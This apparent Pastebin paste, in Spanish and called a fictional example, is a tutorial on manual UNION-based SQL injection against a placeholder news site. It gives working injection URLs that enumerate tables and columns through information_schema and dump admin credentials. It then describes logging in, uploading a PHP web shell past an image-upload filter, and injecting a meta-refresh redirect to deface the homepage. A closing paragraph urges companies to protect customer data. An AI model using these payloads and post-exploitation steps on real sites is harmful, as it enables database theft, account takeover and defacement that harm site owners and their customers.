Data hosted with ♥ by Pastebin.com - Download Raw - See Original
  1. <Ejemplo ficticio ~ Basado en como seria un ataque basico real.
  2.  
  3. Imaginense encontramos una url vulnerable a Sqli, usando dorks, haciendo las pruebas tipicas y identificamos que un website es vulnerable en la variale 'not' asi ; http://sitiovulnerable.cl/noticias.php?not='
  4.  
  5. - Comenzamos a inyectar; ( De la forma mas basica y lenta; existe otras formas, incluso scripts que lo automatizan pero este ejemplo me basare en hacerlo a mano buscando tabla por tabla )
  6.  
  7. http://sitiovulnerable.cl/noticias.php?not=-1+union+select+1--
  8. http://sitiovulnerable.cl/noticias.php?not=-1+union+select+1,2--
  9. http://sitiovulnerable.cl/noticias.php?not=-1+union+select+1,2,3--
  10. http://sitiovulnerable.cl/noticias.php?not=-1+union+select+1,2,4,5--
  11.  
  12. */ y nos ira mosstrando el siguietne mensaje : 'the used SELECT statements have a different number of columns '
  13. Lo que estamos haciendo ahora es obtener el numero de tablas que hay en la pagina y encontrar la vulnerable. y seguimos buscando hasta quela encontramos por ejemplo en 6.
  14.  
  15.  
  16.  
  17. http://sitiovulnerable.cl/noticias.php?not=-1+union+select+1,2,4,5,6-- ---> vulnerable !
  18. Nos daremos cuenta porque apareceRA el website deformado y mostrando el numero de la tabla vulnerable como "mas grande".
  19.  
  20. y comenzmos a inyectar suponiendo que la tabla 6 es la vulnerable.;
  21.  
  22.  
  23.  
  24. http://sitiovulnerable.cl/noticias.php?not=-1+union+select+1,2,4,5,replace%28group_concat%28table_name%29,0x2C,0x3C62723E%29+from+information_schema.tables--
  25.  
  26. y nos mostrara una lista de las tablas contenidas en la base de datos, por ejemplo:
  27.  
  28.  
  29.  
  30. BAN_STATISTICS
  31. CHARACTER_SETS
  32. COLUMNS
  33. COLUMNS_PRIVILEGES
  34. ENGINES
  35. SCHEMATA
  36. VIEWS
  37. ...
  38. ...
  39. ...
  40. wp_comments
  41. wp_links
  42. wp_options
  43. wp_user
  44.  
  45. Y encontramos una tabla relacionada con usuario. 'wp_user'
  46.  
  47. y le sacaremos las columnas ; seguimos inyectando;
  48.  
  49.  
  50.  
  51. http://sitiovulnerable.cl/noticias.php?not=-1+union+select+1,2,4,5,replace%28group_concat%28columns_name%29,0x2C,0x3C62723E%29+from+information_schema.columns+where+table_name=0x77705f75736572--
  52.  
  53. 77705f75736572 no es mas que wp_user en hexadecimal.
  54.  
  55.  
  56. y obtenemos el siguiente resutlado:
  57.  
  58. id
  59. login
  60. email
  61. password
  62. telefono
  63. etc.
  64.  
  65.  
  66. Y ahora vamos a buscar los puntos interesantes para alguien que quisiera entrar al sitio:
  67.  
  68.  
  69.  
  70. http://sitiovulnerable.cl/noticias.php?not=-1+union+select+1,2,4,5,replace%28group_concat%28id,login,email,password,telefono%29,0x2C,0x3C62723E%29+from+wp_user--
  71.  
  72. y listo obtenemos lo inserto en la consulta:
  73.  
  74. 1 admin admin@web.cl dios2012 02-XXXXXXX
  75.  
  76.  
  77. Luego buscamos el login del admin, puede estar en diversos lugares es solo cosa de buscar y lo encontramos en http://sitiovulnerable.cl/admin
  78.  
  79. en login ponemos: admin y como pass: dios2012
  80.  
  81. y listo estamos dentro.
  82.  
  83.  
  84. Etando dentro podemos hacer varias cosas:
  85.  
  86. - Tratar de bypasear el upload de imagenes que debe haber y subir una shell cambiando las cabezeras y repitiendo el POST.
  87. pasando de shell.jpg a shell.php .
  88.  
  89. -Si la programacion te lo permite el uso de, <META HTTP-EQUIV="refresh" CONTENT="1; url=http://www.owned.com"> en una noticia o publicacion que estuviera en el home
  90. del sitio nos permitira redireccionar nuestra pagina apenas entramosa otro sitio en este caso a www.owned.com.
  91.  
  92. - bueno y varios metodos mas que nos sirven para hacer algun tipo de modificacion en el sitio o subir un archivo al servidor.
  93.  
  94. **********************************************************************************************************************************************************************
  95.  
  96. Asi como obtuvimos los datos del admins, tambien pudimos haber obtenido datos ingresados por clientes con sus ruts,nombres,telefonos,correos,incluso direccion
  97. bases de datos completas que pueden user utilizadas para spam, phishing y muchas otras cosas que no serian agradables.-
  98. Mas aun imagina que usas una clave uniersal para todo, como mucha gente lo hace porque asi no se olvida de la clave.
  99. Tendriamos acceso a su correo, demasiada informacion suelta no?
  100.  
  101. *********************************************************************************************************************************************************************
  102.  
  103.  
  104. Es por eso que las empresas, deberian entregar un minimo de seguridad a sus clientes, sino sus datos andaran por lugares que ni imaginas.
  105. Y pensar que cada dato que ingresas a internet jamas saldra de ella, porque aunque eliminen la base de datos, alguien ya lo saco y lo subio en 30 sitios mas
  106. Por eso es que deben cuidar donde ingresan sus datos, y mas aun el llamado es que las empresas deberian tomar conciencia y cuidar la privacidad de sus cleintes
  107. brindandoles un real ambiente seguro,y no solo de adorno, ademas hacerse responsables del manejo de la informacion.
  108.  
  109.  
  110.  
  111.  
  112.  
  113.  
  114.